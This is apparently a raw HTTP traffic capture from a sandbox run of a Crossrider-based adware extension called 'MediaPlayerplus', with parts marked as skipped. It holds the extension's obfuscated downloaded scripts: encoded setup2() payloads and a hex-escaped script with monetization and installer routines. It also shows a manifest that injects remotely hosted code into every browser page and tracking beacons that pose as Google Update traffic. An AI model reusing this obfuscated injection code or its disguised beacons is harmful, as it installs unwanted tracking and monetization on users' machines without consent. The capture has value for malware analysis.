if (typeof setup2 === 'function') { setup2('MWQ2NTY2NDUwYzE4MDcxZDIyMDAwYTRkNTU0NzQ2MDQwNzE5MDc0ODQ5NDAwMTE3MTc0MjFkMDIwNzAwMDkwZDAzMDIwOTFjMDMwZTU5MTEwOTAyNDAwOTE0MWYxMTQyMWIxZDAxMDYwYzQ5MGUxZjRjMjIwNTFiMDEwNjAxMmUwMDUxMzY1NTM2NDYyNzVkNWMyNjQ5MmU0MzVlNDM1ZjIzNWQ1ZTU2NDkyZDRhMmM0NzVmNTY1ZjVlNTI1NTViMzc1YzQ3MzQ1MDJhNDkzNDBkMTgxNjI0MTM0ZjM1MGUwMzAyMTc0YTIzMGMwNTA2MDgwYTFkMmUyMDUxNDE1ZDQ3NDI1NjQ5M2YxNTBiMDgwNjBlMDMzYzA3MDIwYTVhM2IzMzMwM2YzODIxMzUzZDI2MjMyMTNlMmMyYzI3MjIzOTIxMmUyYTIxMzMyYzRiMjMxZDA5MDMwZDA2MTYyNTE3NTAyODJkMjUzZDIwMzQzNzNlM2EyOTMyMjAzOTJhMzczMzIxMjIzNzI4MzMyZDM1M2EyZDM4MmQyODJjMzI1NTVlNmM2NjRkMGYxMDE4MDMxZTIyMDAwYTRkNTU0NzQ2MDQwNzE5MDcwMTVjNDA0MDA5MTQxZjVkMDMxODAyMTQwMDBkMGIwMTAxMDMxZDE0NWMwNTAwMDI0ODBhMWMwMDBmNTgxZTA5MDgwNjA0NGEwNjAwNTIzODAwMGYwODA2MDkyZDA4NGUyODRmMzM1MjJlNWQ1NDI1NDEzMTVkNDQ0NjRiMmE1ZDU2NTU0MTMyNTQzNjQyNGI1ZjVmNTY1MTVkNDQyOTQ2NDIyMDU5MmE0MTM3MDUwNzA4M2UxNjViM2MwZTBiMDExZjU1M2QxNjAwMTIwMTBhMTUyZDI4NGU1ZjQ3NDI1NjVmNDkzNzE2MDMxNzE4MTQwNjI4MGUwMjAyNTkzMzJjMmUyNTNkMzUzYzNkMmUyMDI5MjEzMjM2MjIzNjMwMjEyNjI5MjkyYzMyNTEyNjA5MDAwMzA1MDUxZTNhMDk0YTJkMzkyYzNkMjgzNzNmMjEyNDMzMzczNDMwMmEzZjMwMjkzZDI5MzIzNjM5M2MzYTI1M2IyNTM3MzIyODUwNGE2NTY2NDUxNDAwMDYwYTFlMWMyZjBiNGQ1ZDQ0NWQ0YjU5N2QwZjZj', 'foogdlsmwr'); }....
<<< skipped >>>
GET /plugins/mins/104.js?ver=12&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1407146074"
Last-Modified: Mon, 04 Aug 2014 09:54:34 GMT
Cache-Control: max-age=781
Content-Length: 919
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds042.am4.c
if (typeof setup2 === 'function') { setup2('MGI2NDRmNGU1MDQ4NTQxZTEwMWUwMDNiMWQwMjUyNTI1NjU0MGMxZTA0MWU1NTQxNWYwOTA2MWY0YTAwMWYwMjAzMTcwNzA5MWExYTAxMWU1ZTBkMDAwMzVmMDkxMDEwMGQwNjE5MGYxYjBiNWYwYjFhMWYwMTA0MDQ1MTBiMDcwMzFjNGI0ZTQyMGIwMDFlMzAwNzE0NTUyOTI5MjczODNmM2QzYzNjMzkyYzMzMjQzYjI2MzkyOTI3M2EyZjNiMjMzNDNiMjMzNDMxMzA0ODAzNTk0YjQ2NDIxOTQyNTM1ZjQ4MDM1YjRiNDY0MjA0MTEwMzBhNTMyZjM3MzUyNDJiMzkyMzNjMjYyYTM1M2EyOTM3MzQzYTJmMjAyZTIzMzUzNzI5NTQ0ODYwNTA0ZTRmNGU1MjAwMDIwMjE0MTkyNTFjMDM0YzRhNDg1NDFlMTAxZTAwMWQ1NTQxNWYwOTA2MWY0YTAwMWYwMjAzMTcwNzA5MWExYTAxMWU1ZTBkMDAwMzVmMDkxMDEwMGQwNjE5MGYxYjBiNWYwYjFhMWYwMTA0MDQ1MTBiMDcwMzFjNGI0ZTQyMGIwMDFlMzAwNzE0NTUyOTI5MjczODNmM2QzYzNjMzkyYzMzMjQzYjI2MzkyOTI3M2EyZjNiMjMzNDNiMjMzNDMxMzA0ODAzNTk0YjQ2NDIxOTQyNTM1ZjQ4MDM1YjRiNDY0MjA0MTEwMzBhNTMyZjM3MzUyNDJiMzkyMzNjMjYyYTM1M2EyOTM3MzQzYTJmMjAyZTIzMzUzNzI5NTQ0ODYwNTA0ZTRmNGU1MjE4MWEwMzAzMDMxZTI3MGI0YzRhNDg0NzQ2NTA2MDBk', 'pnonphvvdj'); }....
GET /plugins/mins/93.js?ver=13&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1403819081"
Last-Modified: Thu, 26 Jun 2014 21:44:41 GMT
Cache-Control: max-age=900
Content-Length: 951
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds040.am4.c
if (typeof setup2 === 'function') { setup2('MTE2ZTY4NTUwYzFhMTkxYTI1MTQwNjQ2NWI1NzQ2MDYxOTFlMDA1YzQ1NGIxNjAwMTM0MDFlMWYwMDAzMTgwMjA4MDQwYzQwMGUwNTFkNDkxZDE3NGUwNDAyMzEwMDBiMTkwODQ0MGUxMjA3NWIwYTAxMTkxZjEzMTgwNzA0NGEwYzA2MWIxMDFkMGYwMTEzNDcwMjE3MGIxZjIzMTQ1YjBiMDYwMjUxMjczYTI0MmU0ZDM5MzUyNzMzMzgzNzNkM2YyMzM0MjMzODNiMjQyZjMwMmIyMzJlMzUyMjM1MzczNDM1M2IyNzI5MzUyZjQwMWEwNTEzMDMwYTBiMWYwNDExMGIwZjU5M2UyODI3M2MyMjM5MjMzNDIzMjAyNDI1M2IyZjNkM2EyZjI4MmIyOTI0MjgzYjRjNDE2MDc5NDQwMjEwMTUwNzE3M2IxZjA2NTI1YzRhNDYwOTAzMTAxZTFlNTA1ZjQ5MWQxMzE2NTkxNzFiMWQwZjAyMDAwMzE3MDk1OTA3MDEwMDQ1MDcxNTQ1MTcwNzI4MDkwZjA0MDQ1ZTBjMTkxNDVlMTMwODFkMDIxZjAyMDUwZjU5MDkxZjEyMTQwMDAzMWIxMTRjMTExMjEyMTYyNzA5NTcxMTA0MDk0MjIyMjMyZDJhNTAzNTJmMjUzODJiMzIyNDM2MjcyOTJmMjIzOTJmM2MzNTMyMmEyYTI4MmUyZjM1M2YyNjNlM2UyMDMxMzI0YzAwMDcxODEwMGYxMjE2MDAwYzA3MTU1YjM1M2IyMjI1MmIzZDNlMzgzOTIyMmYzNjNlMzYzNDNlMzIyNDMxMmIyZjNiM2U1NTQ4NjQ2NDQ4MDAwYTFmMDMwODE5MmQwYTRmNTA1MDVmNTk2ZTFj', 'jdawdnmjpf'); }....
GET /plugins/mins/269.js?ver=1&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1403007487"
Last-Modified: Tue, 17 Jun 2014 12:18:07 GMT
Cache-Control: max-age=900
Content-Length: 491
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds046.am4.c
if (typeof setup2 === 'function') { setup2('MGY2ZjYzNTExZjFmMWMxMjNhMDIxODQ3NTA1MzU1MDMxYzE2MWY0YTViNGExYTBiNTkwNjExMDMwYzA0MWQxMzBmMDAwMzBhMWMxMTQxMTMxYjA4NDUxMjE0MWYwMTE0MGE1ZjFkMDA0NDE5MDQ1NDFhMGMwYjRkMmIzYTM4M2QzMzM0Mzc0MDQzN2E3ZDQ3MDIwNzAzMWIxYjM3MWQxYzU2NWY0YTUxMWYxZjFjMTIxYzRhNWI0YTA4NDAxOTUzMDY1MTAxNDI1YTE2MTkxZjU5MDMxZjAxMGIxZTVhMGIwZjA3NTgwYTBiMTYwNjA2MTE0YTAzMTY1OTAxMWI1ZDFkMWUxMDU4MzUyYzI1MjUyYzNkMzA1MjU4NmY2MzUxMDcwNzFkMDUwNjFlM2QwMTQ4NDk1NzU5NWU1YjY1MGQ=', 'tejswkhbop'); }....
GET /plugins/mins/246.js?ver=15&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1411293500"
Last-Modified: Sun, 21 Sep 2014 09:58:20 GMT
Cache-Control: max-age=15
Content-Length: 8475
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds046.am4.c
var _0x4cfc=["\x69\x6E\x73\x74\x61\x6C\x6C\x65\x72","\x67\x65\x74\x41\x64\x64\x69\x74\x69\x6F\x6E\x61\x6C\x49\x6E\x66\x6F","\x69\x73\x46\x75\x6E\x63\x74\x69\x6F\x6E","\x75\x74\x69\x6C\x73","\x69\x73\x44\x65\x66\x69\x6E\x65\x64","\x61\x73\x77","\x69\x73\x41\x72\x72\x61\x79","\x6C\x65\x6E\x67\x74\x68","\x73\x74\x72\x69\x6E\x67","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x72\x65\x70\x6C\x61\x63\x65","\x6D\x61\x74\x63\x68","\x61\x70\x70\x6C\x79","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x42\x61\x73\x65\x36\x34","\x64\x65\x63\x6F\x64\x65","\x63\x61\x6C\x6C","\x70\x61\x72\x73\x65","\x4A\x53\x4F\x4E","\x6D\x6F\x6E\x65\x74\x69\x7A\x61\x74\x69\x6F\x6E","\x69\x6E\x74\x65\x72\x6E\x61\x6C","\x70\x6C\x75\x67\x69\x6E\x73","\x75\x6E","\x64\x65\x66","\x69\x6E\x65\x64","\x70\x6C\x75\x67\x69\x6E\x49\x64","\x67\x65\x74\x45\x78\x74\x65\x6E\x64\x65\x64\x53\x75\x62\x49\x64","\x66\x75\x6E\x63\x74\x69\x6F\x6E","\x73\x6C\x69\x63\x65","\x67\x65\x74\x53\x75\x62\x49\x64","\x67\x65\x74\x54\x69\x6D\x65","\x5F","\x6A\x6F\x69\x6E","\x6E\x61","\x68\x74\x74\x70\x55\x72\x6C","\x5F\x5F\x52\x4E\x44\x5F\x5F","\x67","\x5F\x5F\x41\x44\x56\x41\x4E\x43\x45\x5F\x55\x53\x45\x52\x5F\x5F","\x5F\x5F\x43\x52\x4F\x53\x53\x52\x49\x44\x45\x52\x5F\x41\x53\x57\x5F\x5F","\x5F\x5F\x43\x52\x4F\x53\x53\x52\x49\x44\x45\x52\x5F\x49\x4E\x53\x54\x41\x4C\x4C\x5F\x54\x49\x4D\x45\x5F\x5F","\x67\x65\x74\x55\x6E\x69\x78\x54\x69\x6D\x65","\x5F\x5F\x43\x52\x4F\x53\x53\x52\x49\x44\x45\x52\x5F\x43\x4F\x55\x4E\x54\x52\x59\x5F\x43\x4F\x44\x45\x5F\x5F","\x67\x65\x74\x43
<<< skipped >>>
GET /plugins/javascripts/jquery-1_7_1_min.js?ver=5&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1407922596"
Last-Modified: Wed, 13 Aug 2014 09:36:36 GMT
Cache-Control: max-age=900
Content-Length: 94779
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds039.am4.c
var jQuery = $jquery_171 = $jquery = null;..if (document && typeof document.getElementById !== "undefined") {../*! jQuery v1.7.1 jquery.com | jquery.org/license */.(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f("<" a ">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){cl||(cl=c.createElement("iframe"),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"") "<html><body>"),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,"display"),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ci(){try{return new a.XMLHttpRequest}catch(b){}}function cc(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=a.dataTypes,e={},g,h,i=d.length,j,k=d[0],l,m,n,o,p;for(g=1;g<i;g ){if(g===1)for(h in a.converters)typeof h=="string"&&(e[h.toLowerCase()]=a.converters[h]);l=k,k=d[g];if(k==="*")k=l;else if(l!=="*"&&l!==k){m=l " " k,n=e[m]||e["* " k];if(!n){p=b;for(o in e){j=o.split(" ");if(j[0]===l||j[0]==="*"){p=e[j[1] " " k];if(p){o=e[o],o===!0?n=p:p===!0&&(n=o);break}}}}!n&&!p&&f.error("No conversion from "
<<< skipped >>>
GET /monetization.gif?rand=3098&event=7&agent_type=2&ibic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&campaign=001359 HTTP/1.1
User-Agent: Google Update/1.3.25.0;winhttp
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
Host: logs.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1413862437.dop011.am4.t,1413862437.cds058.am4.c
GIF89a.............,...........D..;..
GET /ThawteTimestampingCA.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.thawte.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "075003e67d35591a801778336e66e994:1411607711"
Last-Modified: Thu, 25 Sep 2014 01:15:11 GMT
Date: Tue, 21 Oct 2014 03:33:49 GMT
Content-Length: 341
Connection: keep-alive
Content-Type: application/pkix-crl
0..Q0..0...*.H........0..1.0...U....ZA1.0...U....Western Cape1.0...U....Durbanville1.0...U....Thawte1.0...U....Thawte Certification1.0...U....Thawte Timestamping CA..140922000000Z..141231235959Z0...*.H...............z ...H.....h.......>V......<...Y*.4..m.P{w.yN.*..rH....o7._..B.H..$O......D(..Or..E..e3....XR.#!1.5j.h..p......<.#..:.FI..l?...
GET /omaha/430FD4D0-B729-4F61-AA34-91526481799D/1/ping.xml?rand=3095 HTTP/1.1
User-Agent: Google Update/1.3.25.0;winhttp
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
Host: update.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:56 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1399825872"
Last-Modified: Sun, 11 May 2014 16:31:12 GMT
Cache-Control: max-age=3316
Content-Length: 229
Content-Type: text/xml; charset=UTF-8
X-HW: 1413862436.dop012.am4.t,1413862436.cds062.am4.c
<?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.0" server="prod">. <daystart elapsed_seconds="56754"/>. <app appid="{430fd4d0-b729-4f61-aa34-91526481799d}" status="ok">. .<event status="ok"/>. </app>.</response>...
GET /omaha/B13CB685-2858-4509-BB2E-34E3545B73F9/1/ping.xml?rand=3105 HTTP/1.1
User-Agent: Google Update/1.3.25.0;winhttp
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
Host: update.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:58 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1399811336"
Last-Modified: Sun, 11 May 2014 12:28:56 GMT
Cache-Control: max-age=21600
Content-Length: 229
Content-Type: text/xml; charset=UTF-8
X-HW: 1413862437.dop012.am4.t,1413862438.cds046.am4.s,1413862438.dop003.se1.r,1413862438.cds016.se1.p,1413862438.cds046.am4.p
<?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.0" server="prod">. <daystart elapsed_seconds="56754"/>. <app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">. .<event status="ok"/>. </app>.</response>...
GET /tss-ca-g2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: ts-crl.ws.symantec.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "8511e81ed9a0e75095d40bb42766b437:1413839808"
Last-Modified: Mon, 20 Oct 2014 21:16:48 GMT
Date: Tue, 21 Oct 2014 03:33:49 GMT
Content-Length: 477
Connection: keep-alive
Content-Type: application/pkix-crl
0...0.....0...*.H........0^1.0...U....US1.0...U....Symantec Corporation100...U...'Symantec Time Stamping Services CA - G2..141020210119Z..141030210119Z.00.0...U.#..0..._..n\..t...}.?..L...0...U........0...*.H.............~.......... ... ..?w0..Rr.."...?.......pi....F.'|.4..n....%..J.@.z.)..m.2.<.....Q.32.....k(S#........2V...3.......j,....4F........^..K.e..d...}.E5S......c...y..c.J.O.s.T...A.....t.d...3@.rd...g..L8..q.8.Ws6..i<.../..HP<..J.%o@.....37..=......T.........ubTn..
GET /plugin/apps/54246/manifest/1_34_05_12/ie6/manifest.xml?ver=33&rnd=4638 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:55 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1412095900"
Last-Modified: Tue, 30 Sep 2014 16:51:40 GMT
Cache-Control: max-age=900
Content-Length: 1706
Content-Type: text/xml; charset=UTF-8
X-HW: 1413862435.dop013.am4.t,1413862435.cds049.am4.pr
<?xml version="1.0" encoding="UTF-8"?>.<CrAppInfo>. <Ver>102</Ver>. <ShortName>MediaPlayerplus</ShortName>. <Description>MediaPlayerEnhance Extension</Description>. <PublisherName>Freeven</PublisherName>. <HomePageLink>NA</HomePageLink>. <JSLink>hXXp://js.newdatastatsserv.com/plugin/apps/54246/js/na/ie/app_code.js</JSLink>. <GroupID>0</GroupID>. <Domain>NA</Domain>. <RunInIframe>false</RunInIframe>. <ThanksURL>NA</ThanksURL>. <EmailSignature>NA</EmailSignature>. <SettingsURL>NA</SettingsURL>. <CertifiedInstall>NA</CertifiedInstall>. <ExposeSites>NA</ExposeSites>. <RemoteFBApiURL>NA</RemoteFBApiURL>. <DisableIE>true</DisableIE>. <DisableFF>true</DisableFF>. <EnableSearchIE>false</EnableSearchIE>. <EnableSearchFF>false</EnableSearchFF>. <AddressbarIE>NA</AddressbarIE>. <AddressbarFF>NA</AddressbarFF>. <AddressbarFFEnhanced>NA</AddressbarFFEnhanced>. <AddressbarCR>NA</AddressbarCR>. <NewTabURL>NA</NewTabURL>. <NewTabEmbed>NA</NewTabEmbed>. <OpenSearchURL>NA</OpenSearchURL>. <BackgroundJS>hXXp://js.newdatastatsserv.com/plugin/apps/54246/bg/na/ie/bg_code.js</BackgroundJS>. <BackgroundVer>2</BackgroundVer>. <Manifest>NA</Manifest>. &l
<<< skipped >>>
GET /plugin/apps/54246/js/na/ie/app_code.js?ver=102&rnd=6758 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:55 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1412093723"
Last-Modified: Tue, 30 Sep 2014 16:15:23 GMT
Cache-Control: max-age=496
Content-Length: 736
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862435.dop013.am4.t,1413862435.cds056.am4.c
.. /************************************************************************************. This is your Page Code. The appAPI.ready() code block will be executed on every page load.. For more information please visit our docs site: hXXp://docs.crossrider.com.*************************************************************************************/...appAPI.ready(function($) {.. //alert(appAPI.isMatchPages("*youtube*"));. //alert(appAPI.isMatchPages("*watch*"));. //alert(appAPI.isMatchPages("*hd=1*")). . if (appAPI.isMatchPages("*youtube*") && appAPI.isMatchPages("*watch*") && !appAPI.isMatchPages("*hd=1*")) {. .//alert(window.location);. window.location = window.location "&hd=1". //alert(window.location);. }..});.....
GET /plugin/apps/54246/bg/na/ie/bg_code.js?ver=2&rnd=3013 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:56 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1412093734"
Last-Modified: Tue, 30 Sep 2014 16:15:34 GMT
Cache-Control: max-age=900
Content-Length: 432
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862436.dop013.am4.t,1413862436.cds042.am4.pr
../************************************************************************************. This is your background code.. For more information please visit our wiki site:. hXXp://docs.crossrider.com/#!/guide/scopes_background.*************************************************************************************/..appAPI.ready(function($) {.. // Place your code here (ideal for handling browser button, global timers, etc.)..});......
GET /plugin/apps/54246/plugins/na/ie/plugins.json?ver=93&rnd=9729 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:56 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1412093724"
Last-Modified: Tue, 30 Sep 2014 16:15:24 GMT
Cache-Control: max-age=900
Content-Length: 18161
Content-Type: text/plain; charset=UTF-8
X-HW: 1413862436.dop013.am4.t,1413862436.cds047.am4.pr
{.."plugins_version": 93,.."plugins_list":. [. {"id":4,"url":"hXXp://js.newdatastatsserv.com/plugins/javascripts/jquery-1_7_1_min.js","ver":5,"name":"jquery_1_7_1","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":true,"px":true},"targets":[{"run_at":1,"order":10200},{"run_at":0,"order":100},{"run_at":5,"order":100},{"run_at":2,"order":10200}],"enabled":true},{"id":2,"url":"hXXp://js.newdatastatsserv.com/plugins/mins/2.js","ver":2,"name":"ie8_fix_1","browsers":{"ie":true,"ff":false,"ch":false,"sf":false,"nv":false,"px":false},"targets":[{"run_at":1,"order":10100},{"run_at":2,"order":10100}],"enabled":true},{"id":3,"url":"hXXp://js.newdatastatsserv.com/plugins/mins/3.js","ver":2,"name":"ie8_fix_2","browsers":{"ie":true,"ff":false,"ch":false,"sf":false,"nv":false,"px":false},"targets":[{"run_at":1,"order":10300},{"run_at":2,"order":10300}],"enabled":true},{"id":47,"url":"hXXp://js.newdatastatsserv.com/plugins/mins/47.js","ver":3,"name":"resources_background","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":false,"px":false},"targets":[{"run_at":0,"order":30000},{"run_at":5,"order":30000}],"enabled":true},{"id":246,"url":"hXXp://js.newdatastatsserv.com/plugins/mins/246.js","ver":15,"name":"setup","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":true,"px":true},"targets":[{"run_at":0,"order":5},{"run_at":1,"order":5}],"enabled":true},{"id":267,"url":"hXXp://js.newdatastatsserv.com/plugins/mins/267.js","ver":1,"name":"stats_ch","browsers":{"ie":false,"ff":false,"ch":true,"sf":false,"nv
<<< skipped >>>
GET /plugins/mins/42.js?ver=10&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:56 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1409568411"
Last-Modified: Mon, 01 Sep 2014 10:46:51 GMT
Cache-Control: max-age=900
Content-Length: 7866
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862436.dop013.am4.t,1413862436.cds038.am4.c
var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI==="undefined"){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window=="undefined"){window={};}if(typeof window.document==="undefined"){window.document={};document=window.document;}if(typeof window.alert==="undefined"){window.alert=function(b){var c;if(typeof b==="undefined"){c="undefined";}else{if(b===null){c="null";}else{c=b.toString();}}if(typeof c==="string"){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console==="undefined"){window.console={};console=window.console;}if(typeof console.log==="undefined"){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info==="undefined"){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn==="undefined"){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error==="undefined"){window.console.error=function(a){};console.error=window.console.error;}if(typeof console.assert==="undefined"){window.console.assert=function(a){};console.assert=window.console.assert;}if(typeof console.dir==="undefined"){window.console.dir=function(a){};console.dir=window.console.dir;}if(typeof console.clear==="undefined"){window.console.clear=function(a){};console.clear=window.console.clear;}if(typeof console.profile==="undefined"){window.console.profile=function(a){};console.profile=window.console.profile;}if(typeof console.profileEnd==="undefined"){window.console.profileEn
<<< skipped >>>
GET /plugins/mins/281.js?ver=2&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:56 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1403604591"
Last-Modified: Tue, 24 Jun 2014 10:09:51 GMT
Cache-Control: max-age=900
Content-Length: 483
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862436.dop013.am4.t,1413862436.cds064.am4.c
if (typeof setup2 === 'function') { setup2('MGY3ZjYyNWEwNDEyMDYwYTI3MGIxODU3NTE1ODRlMGUwNjBlMDI0MzViNWEwODE0MDcwYjFkMTQ1YzFhMWIxODQ0MTkwODM1MTcwODA0MWM1YjEyMGUwYzM4MDcxNTQ1MTExMDEwNDgzNDI3MmYzNDNkMjkyMTJiM2QzMTJlMmEzMzIzMmEyZTM3MzczMDMwMmYyNzNmMzMzMDI1M2IzZDJiMmE0ZDA4MDUwMjRmNGI0MzQ5NDY0NDRkMGMxNTE2MTc0NzFiMTcxZTEwMDgwYzRhMDcwMjBhM2MxODE5MTA1NjI3MzMyNTIwMzUyMTJhMjYzYzJmM2QzZTM5MzMyYTIyMjYzYTM0MjYzZDMzMzk1MDU2Nzg3MDU2MDUwNzBkMGIwZjFjMzMxNjViNGU1NTU5NDA1ZDZjMGY=', 'tukxlfrzry'); }....
GET /plugins/mins/286.js?ver=2&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:56 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1403817866"
Last-Modified: Thu, 26 Jun 2014 21:24:26 GMT
Cache-Control: max-age=900
Content-Length: 975
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862436.dop013.am4.t,1413862436.cds064.am4.c
